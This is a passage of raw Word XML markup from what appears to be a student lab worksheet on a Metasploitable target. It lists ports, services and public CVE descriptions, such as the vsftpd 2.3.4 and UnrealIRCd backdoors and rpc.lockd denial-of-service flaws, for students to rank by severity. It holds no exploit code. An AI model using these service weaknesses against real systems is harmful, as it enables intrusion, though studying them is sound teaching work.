          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E76F4FA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>57868</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04A0C9A8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nlockmgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2764D34D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1-4 (RPC #100021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="620AFD53" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="63"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2013-6209,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2002-2071,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2000-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>0508</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5AA53683" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Unspecified vulnerability in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpc.lockd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the NFS subsystem in HP HP-UX B.11.11 and B.11.23 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">allows remote attackers to cause a denial of service via unknown vectors. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F2925DF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="389E8D2A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpc.lockd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> in Red Hat Linux 6.1 and 6.2 allows remote attackers to cause a denial of service via a malformed request. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="359A6418" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B28FAC2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E28AA63" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391D5D80" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>List of vulnerable services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698C08E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Students identify the TOP five services most vulnerable to CVE (https://nvd.nist.gov/vuln-metrics/cvss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FE540" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Table 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA7DAC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="right"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1057"/>
        <w:gridCol w:w="1240"/>
        <w:gridCol w:w="1637"/>
        <w:gridCol w:w="5698"/>
      </w:tblGrid>
      <w:tr w:rsidR="00970F89" w14:paraId="69DBE3C4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1057" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="06A41CE2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="60F4C512" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29391B82" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerable service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0EE10726" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerable service details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="2066A57C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1057" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33BDC16D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11B249AB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FC0DB24" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5701" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="24A3F2DC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>vsf_filename_passes_filter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> function in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>ls.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> before 2.3.3 allows remote authenticated users to cause a denial of service (CPU consumption and process slot exhaustion) via crafted glob expressions in STAT commands in multiple FTP sessions, a different vulnerability than CVE-2010-2632.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40A8A249" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="250E73A4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1057" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1CE74D28" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>6697</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1241" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7087B977" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>irc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21E30471" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Admin email </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>admin@Metasploitable.LAN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5701" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D2E206B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor that was inserted into the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> source code, allowing remote attackers to execute arbitrary commands with the privileges of the user running the IRC daemon.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9E79A6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13AD8171" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Buffer overflow in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.2beta11 through 3.2.8, when </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>allow::</w:t>
            </w:r>
